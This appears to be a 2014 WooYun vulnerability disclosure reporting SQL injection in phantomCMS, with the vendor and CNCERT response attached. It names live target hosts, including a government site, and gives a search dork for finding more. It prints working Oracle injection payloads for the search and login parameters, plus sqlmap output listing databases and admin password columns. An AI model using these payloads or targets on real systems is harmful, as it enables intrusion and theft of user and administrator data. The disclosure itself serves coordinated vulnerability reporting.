当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-057079

漏洞标题:某增值电信业务通用系统多处SQL注入

相关厂商:cncert国家互联网应急中心

漏洞作者: xfkxfk

提交时间:2014-04-16 18:06

修复时间:2014-07-15 18:07

公开时间:2014-07-15 18:07

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-04-16: 细节已通知厂商并且等待厂商处理中
2014-04-21: 厂商已经确认,细节仅向厂商公开
2014-04-24: 细节向第三方安全合作伙伴开放
2014-06-15: 细节向核心白帽子及相关领域专家公开
2014-06-25: 细节向普通白帽子公开
2014-07-05: 细节向实习白帽子公开
2014-07-15: 细节向公众公开

简要描述:

增值电信业务中,某通用系统存在多处SQL注入。

详细说明:

增值电信业务中,某社区类CMS,phantomCMS,是江苏鸿信系统集成有限公司的一套管理系统,此系统多省市再也,存在多出SQL注入,可被脱裤。
Google关键字:inurl:phantomCMS
http://221.226.22.234:8088/phantomCMS/toSqwz.action?sid=2
http://www.jssqw.net/phantomCMS/toSqwz.action?sid=2
http://222.92.198.27/phantomCMS/toSqwz.action?sid=2
http://www.liuxiang.gov.cn/phantomCMS/toSqwz.action?sid=
第一处SQL注入:
拿http://221.226.22.234:8088/phantomCMS/toSqwz.action?sid=2为例:
在搜索处存在SQL注入,如下:
http://221.226.22.234:8088/phantomCMS/tempScenario/zymjd/articleSearchList.jsp?sid=2&searStr=123%25%27

---
Place: GET
Parameter: searStr
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: sid=2&searStr=123') AND 2424=(SELECT UPPER(XMLType(CHR(60)||CHR(58)
||CHR(113)||CHR(115)||CHR(105)||CHR(100)||CHR(113)||(SELECT (CASE WHEN (2424=242
4) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(120)||CHR(106)||CHR(101)||CHR(11
3)||CHR(62))) FROM DUAL) AND ('udbt'='udbt
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (comment)
    Payload: sid=2&searStr=123') AND 1642=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR
(80)||CHR(82)||CHR(85),5)--
---
[22:06:10] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle


第二处SQL注入:
拿http://www.jssqw.net/phantomCMS/toSqwz.action?sid=2为例:
在登录处存在SQL注入,如下:
连接:http://www.jssqw.net/ynlUserLogin.action
POST:fromIndex=yes&loginBean.communityAccount=111&loginBean.cummunityUserAccount=111&loginBean.password=111&Submit=%E6%8F%90%E4%BA%A4

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: loginBean.communityAccount
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: fromIndex=yes&loginBean.communityAccount=111' AND 8484=DBMS_PIPE.RE
CEIVE_MESSAGE(CHR(113)||CHR(106)||CHR(102)||CHR(121),5) AND 'eogz'='eogz&loginBe
an.cummunityUserAccount=111&loginBean.password=111&Submit=%E6%8F%90%E4%BA%A4
---
[22:08:23] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle

漏洞证明:

第一处SQL注入:
http://221.226.22.234:8088/phantomCMS/tempScenario/zymjd/articleSearchList.jsp?sid=2&searStr=123
跑出的数据库信息如下:

available databases [29]:
[*] CMS
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] GL_CMS61
[*] GL_FORUM61
[*] GL_INTER61
[*] GL_OLDPRINT
[*] GL_SQ61
[*] HR
[*] IX
[*] LIXIANG
[*] MDSYS
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] SCOTT
[*] SH
[*] SQ
[*] SQELIST
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB


数据库CMS的内容:

Database: CMS
[42 tables]
+-----------------------------+
| CMS_ARTICLE                 |
| CMS_ARTICLE_CONTENT         |
| CMS_ARTICLE_PICTURE         |
| CMS_ARTICLE_RECORD          |
| CMS_CHANNEL                 |
| CMS_CLICK_RATE_DETAIL       |
| CMS_DICTIONARY              |
| CMS_FLOAT_PICTURE           |
| CMS_INFO_SHARE_CIRCLE       |
| CMS_INFO_SHARE_CIRCLE_SITE  |
| CMS_LOCALITY_POLICE         |
| CMS_MONTH_STAR              |
| CMS_ORGANIZATION_SITE       |
| CMS_PICTURE                 |
| CMS_POLICE_REPORT           |
| CMS_POLICE_SERVICE          |
| CMS_REFERENCE               |
| CMS_SITE                    |
| CMS_SITE_ADMIN              |
| CMS_SITE_LINK               |
| CMS_SITE_PICTURE            |
| CMS_SITE_ROLE               |
| CMS_STOPWORD                |
| CMS_TEMPLATE                |
| CMS_TEMPLATE_SCENARIO       |
| CMS_TEMPLATE_TYPE           |
| CMS_THEMATIC                |
| CMS_THEMATIC_ARTICLE        |
| CMS_THEMATIC_CHANNEL        |
| P_ADMIN                     |
| P_ADMIN_ROLE                |
| P_FUNCTION                  |
| P_LOAD_INFORMATION          |
| P_MODULE                    |
| P_ORGANIZATION              |
| P_ROLE                      |
| P_ROLE_FUNCTION             |
| P_ROLE_MODULE               |
| SYS_OPERATION_LOG           |
| SYS_PARAMETER               |
| SYS_SELECT_PARAMETER        |
| SYS_SELECT_PARAMETER_DETAIL |
+-----------------------------+


Database: CMS
Table: P_ADMIN
[9 columns]
+-------------+----------+
| Column      | Type     |
+-------------+----------+
| PA_ACCOUNT  | VARCHAR2 |
| PA_ADDRESS  | VARCHAR2 |
| PA_EMAIL    | VARCHAR2 |
| PA_ID       | NUMBER   |
| PA_NAME     | VARCHAR2 |
| PA_PASSWORD | VARCHAR2 |
| PA_PHONE    | VARCHAR2 |
| PA_STATE    | NUMBER   |
| PA_TYPE     | NUMBER   |
+-------------+----------+

修复方案:

过滤

版权声明:转载请注明来源 xfkxfk@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-04-21 10:24

厂商回复:

CNVD确认并在多个实例上复现所述情况,根据测试情况,已经转由CNCERT下发给江苏分中心,要求江苏分中心协调软件生产厂商处置。

最新状态:

暂无